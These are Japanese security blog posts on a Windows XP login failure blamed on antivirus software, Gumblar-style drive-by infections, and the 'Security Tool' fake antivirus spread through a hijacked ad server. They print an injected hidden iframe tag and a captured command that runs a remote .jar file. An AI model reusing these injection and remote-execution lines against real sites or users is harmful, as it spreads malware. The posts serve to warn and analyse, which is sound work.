セキュリティの最近のブログ記事

2011年1月27日 ユーザープロファイルを読み込めませんでした - smilebanana

昨日のおまけ。

正常にログインできなくなったのはウイルスセキュリティZEROが原因だったようです・・・が。

ソースネクストの言い分は

っていうかFirefoxで見てもIE8で見ても表示が崩れてるってどういう事（笑）

重要：Windows Updateした後、パソコンが起動しなくなった方へ

1月12日のWindows Updateを適用したWindows XPの一部の環境で、「ユーザープロファイルを読み込めませんでした」や「Unknown Hard Error」などのエラーでパソコンが起動できないお問い合せが寄せられています。

Q. 【ウイルスセキュリティ】パソコンが正常に起動しなくなった（「ユーザープロファイルを読み込めませんでした」や「Unknown Hard Error」と表示される）

A. 以下の手順をご確認ください

「ユーザープロファイルを読み込めませんでした」や「Unknown Hard Error」と表示され、パソコンが起動しない場合、Windows Updateや常駐ソフトのインストールなどで使用できるメモリが減り、正常に起動できなくなっている可能性があります。

この現象に対応するため、パソコン起動時のメモリ使用量をより少なく抑えるアップデータを配信しています。

エントリーとアップデートを行なうことで自動的にアップデータが適用されますので、現在の状態にあわせて、それぞれ以下の手順をお試しください。

今回起動しなくなったパソコンは事情があって自動更新が無効にされていたので、2010年8月からWindowsUpdateが全く行われていないんですけどねぇ。

（それってセキュリティ的にどうなのという話はこの際置いておいて）

不思議ですねぇ。

それから

これがセキュリティZEROを一旦削除する前

これが手順に従って、再インストールを行った後アップデートが1回行われた状態。

なんじゃろなぁ、これ。

これ、なんじゃろなぁ。

とあるWindowsXP SP3のパソコン。

いつものように使おうと思ったら、変なエラーが出てログインできない。

ユーザー環境

ユーザープロファイルを読み込めませんでしたが、既定のシステムプロファイルを使ってログオンしました。

詳細－システムリソースが不足しているため、要求されたサービスを完了できません。

OKボタンを押して閉じるとまた別のメッセージボックス。

userinit.exe - アプリケーションエラー

アプリケーションを正しく初期化できませんでした (0xc000012d)。[OK]をクリックしてアプリケーションを終了してください。

そいでもってこの画面(もしくは真っ青な画面にマウスポインタのみの状態)でほぼフリーズ。

強制的にシャットダウンしてもう一回起動してみると

今度は簡易的ではないログイン画面。

そのままOKボタンを押してログインしようとすると真っ青な画面にマウスポインタのみの状態でほぼフリーズ。

タスクマネージャーを立ち上げようとCtrl + Alt + Delを押すと

馬鹿には見えないメッセージ。(私は馬鹿なので見えません)

他にも色々試していると

文字が消えるどころか背景も消えたり

services.exeのエラーが出たり。

services.exe - アプリケーションエラー

アプリケーションを正しく初期化できませんでした (0xc0000142)。[OK]をクリックしてアプリケーションを終了してください。

あれ？そういえば文字が消えるって前にもあったな。

2009年6月13日 文字が消えてしまう - smilebanana

この時はウイルス対策ソフトが悪かったんだけど、今回のはログイン直後からだしちょっと状態が違うんよねー。

ちなみにこの状態を、よくパソコンわからない人に説明させると

あのね、なんかパソコンが変なんだよ。立ち上がらないの。クリックしたらなんか出てね、固まってね。あとパスワード入れてないのにパスワード聞いてくるんだよ。

みたいな感じになります。

「ホームページを見ているだけ」でも感染しちゃう系

　↓

「ホームページを見ているだけ」でも感染しちゃう系2

の続き。

Antivirus Actionの生態調査・・・というほどのもんでもない。

Livedoorのニュース見てる時に間違えて広告クリックしたらリンク先のサイトが改ざんされていてウイルスが的な昨日の続き。

問題のサイトに、結構無防備な状態のパソコンでアクセスするとどうなってしまうのか。

基本的にはがんぶらーとたわむれていた時作った環境を使い回してますので以下のような感じ。

仕事中に、livedoorのニュースを見てたんですよね。

(別にサボっていたわけじゃなくてホラやっぱり営業ってトークに組み込むために最新情報知っとかなきゃいけないじゃないですが違いますよ全然サボってたわけじゃないんですよ。これもお仕事の一環なんです。そうなんです。)

ニュースの詳細を知ろうと思ってリンクをクリックした時にどうやら間違えて広告をクリックしちゃったみたいなんですよね。

そしたら新しいウィンドウにニュースとは全然関係ない、とあるNPOのサイトが表示されたんです。

(あら間違っちゃったわー、閉じなきゃー)とか思っていたら突然AdobeReaderが立ち上がったんですよね。

(おや？なんか嫌な予感)なんて思う間もなく画面右下に

(再現)

さっきダウンロードされたPDFファイルはウイルスだったので削除したよ！

という、ウイルス対策ソフトからのメッセージ。

一時はこの手のウイルスと散々キャッキャウフフしてきた私ですから

8080系(いわゆるガンブラー系)記事のまとめ

(あーこのサイト多分がんぶらーによって改ざんされてるなぁ・・・)とすぐにポーンと気づきページのソースをチェックしてみました。

・・・が、どこをどう見ても例の難読化されたブツが見あたらない。

そんな馬鹿な！どういうこっちゃ！どういうこっちゃ兄弟！

AVG Anti-Virus 2011をインストールした環境で当サイト2010年1月16日付けのエントリーを開くとなにやらウイルスが検出されるというコメントを頂きました。

ガンブラー vs ウイルスバスター2010 - smilebanana

なるほど、AVG Anti-Virus Free Edition 2011をインストールした状態でアクセスしてみると

なんか脅威が検出されました。

尋常じゃねぇ存在感ッ!!キティちゃんの首が長すぎるUSBメモリ : ギズモード・ジャパン

地獄のミサワだこれーっ！！

と思ったんですけど冷静になってみてみたらそうでもないですね。

なんで地獄のミサワに見えちゃったんだろ・・・。

やだ・・・ちょっと恥ずかしい。

さて

偽セキュリティソフト「Security Tool」感染爆発、原因はマイクロアドの広告配信サーバへの攻撃 - GIGAZINE

Security Tool大流行の流れを作ったサイトのうちの一つであるGIGAZINEにてその件についての記事があがってます。

9月24日(金)の21時半頃から9月25日(土)0時27分にかけてGIGAZINE・毎日jp・Impress・Slashdot・価格.com・食べログ・みんなの株式・みんカラ・J-CASTなど多数のサイトのページを見た一部ユーザーが偽セキュリティソフト「Security Tool」に感染している可能性が明らかになりました。

(中略)

マイクロアドから新しいリリースが出ました。

弊社サービスの改ざんに関する影響範囲の一部報道について|マイクロアド
http://www.microad.jp/press/20100928/

改ざん時間帯における最大の閲覧者数は68万人だったそうです。

影響でけぇー・・・

ところで今回のは前のがんぶらーみたいにSecurity Toolを仕込む途中でFTPなどのアカウント情報を盗んだりしないんでしょうかね？

参考：UnderForge of Lack » Blog Archive » [NOTICE] がんぶらー’ed される FTP list

WinPcap的な大変気持ち悪いものをこっそり仕掛けたりしないんでしょうかね？

参考：Gumblar.8080系感染してみた 7月9日版 - smilebanana

みんなSecurity Toolに気をとられすぎて何か別の大事な事を見逃していやしないかと思ったりするんですけどね。

まぁFTPアカウントが盗まれてたら今頃二次災害的な事が起こって騒ぎになってるでしょうから、それがなさそうだという事は大丈夫なんでしょうかね？

・・・本当に大丈夫なんでしょうかね？

昨日あたりから突然アクセス数が普段の3倍強になったので

やっべぇ、炎上か！？

とビクビクしながらアクセスログをチェックしたら

特定のキーワードによるGoogleからのお客様が急増加。一体何事じゃ！？

(普段SecurityTool関連のリクエストは多くても合計で50件前後)

軽く調べてみたら

ADサーバー掲出タグによるセキュリティアラートと対処について - スラッシュドット・ジャパン

今回は大変ご迷惑をおかけしまして申し訳ありませんでした。

OSDNのサイトでは、広告バナーの配信のためのADサーバーとして、MicroAD社のVASCOを使っておりましたが、本来掲出されるはずの広告タグの前に不明なiframeタグ差し込まれるという事態が発生し、その中身によって不明なサイトに誘導されるということが起きてしまいました。

原因がVASCO ADサーバーによるものだと特定でき、OSDN管理のADサーバーに切り替えたのは24日23:30です。その後、キャッシュなどに残っていないか確認作業を進め、25日0:29にOSDN全サイトで問題ないことを確認いたしました。

具体的な現象としては、vsc.send.microad.jpのJavaScriptから掲出されるタグにおいて、

<iframe width="1" height="1" src="http://xxxx.ipq.co/statsm?ref=jp"></iframe>

xxxxはversus

のタグが差し込まれ、ここからセキュリティ上警告を受けるサイトに誘導されるというものです。

なんか色んなサイトへ配信されてる広告に例のコードが挿入されてたっぽい？

追記・修正:2:12）
Googleのアップデートで「.redmancerg.net」を検索のつぶやきなどでも確認できるように、影響の範囲はVASCOを採用している各サイトの広範囲に及んでいるようです。gigazine.net、 impress.co.jpほか、7netshopping.jp、mainichi.jpなど未対処と思われるサイトもあるので注意してください。

あら、これはやばい。

配信可能性のある時間帯は、弊社が確認できている範囲ですと、
　OSDNサイト：24日21:00～24日23:30
　他社サイト：24日21:00～25日午前1:30
です。

今この記事を見ている人は大丈夫ですよね！

きちんと対策できてますよね！！

対策→セキュリティ通信｜トピックス　初心者必見！ 究極の感染対策「6つの約束」を実行しよう

で、Googleから飛んできた人のアクセスが集中しているのは

Security Tool 削除作業 - smilebanana

この記事なわけですが、記事内にもある通り私としては感染したパソコンは再インストール(リカバリ)する事をおすすめしております。

そしてこれに懲りたらちゃんと対策しておきましょうね！

対策→セキュリティ通信｜トピックス　初心者必見！ 究極の感染対策「6つの約束」を実行しよう

どこからのリンクかわかりませんが

くどいようですが、ちゃんと対策(各種アップデート＆設定)しときましょうね！！！

対策→セキュリティ通信｜トピックス　初心者必見！ 究極の感染対策「6つの約束」を実行しよう

iPhoneが乗っ取られるリスク、「Gumblar攻撃」の併用で具現化する恐れ - ITmedia エンタープライズ

>ラックの最高技術責任者の西本逸郎氏は、脆弱性悪用の方法を応用することで、遠隔からiPhoneやiPadを不正操作できるようになると指摘する。攻撃者は、端末に保存されている電話帳やメール、画像などのデータを抜き取ることができるようになる。また、端末にコマンドを送信することで、特定の電話番号に発信したり、Webサイトに接続させたりすることが可能になるという。

ちょっと前の話ですけど。

タイトルにGumblarって入ってますが

特に正規のWebサイトを改ざんしてドライブバイダウンロードでマルウェアに感染させる「Gumblar攻撃」が使われた場合は、危険性がさらに高まる恐れがある。

現状のGumblar.8080系がiPhone・iPadへどうこうという話ではないっぽい。

芸能界の人とかよくわからずiPhone使っている人が多そう(偏見)なのでそのような人向けに感染用のアドレスばらまけば芸能人のアドレス情報・メール・画像がごっそり・・・

なんつって。

いやー、恐いですねー。

スマートホンもこれからは更新情報をきちんと追いかけてないとですねー。

Gumblar.8080系感染してみた 7月9日版 - smilebanana

>もう一度Process Monitorのログが残るような形で試して詳しいログを・・・と思って今やってるんですが、また感染できない状態に戻ってしまいました。

前回の最後に「また感染できない状態に戻ってしましましま。」とお伝えしましまが、以前ふられた時のように、リダイレクト先から何も返事がないというわけではないのです。

パケットログを見ると

一つ目(ns39.xxx.net:8080 [194.150.xxx.199])・二つ目(customer.fxs.se:8080 [62.20.xxx.61])のリダイレクト先サーバーからは次々とへんちくりんなものをダウンロードしてきて、タスクバーにJavaのアイコンが表示されたりして何やらゴソゴソと処理はしているようなんですが、その後

"C:\Program Files\Java\jre6\bin\javaws.exe" http: -J-jar -J\\90.156.xxx.xx1\public\001.jar none

こっそり別のサーバー(90.156.xxx.xx1)からファイルを実行しようとするものの

現在そのファイルにはつながらないらしく、エラー表示。

で、そこからは先に進まず。

みたいな。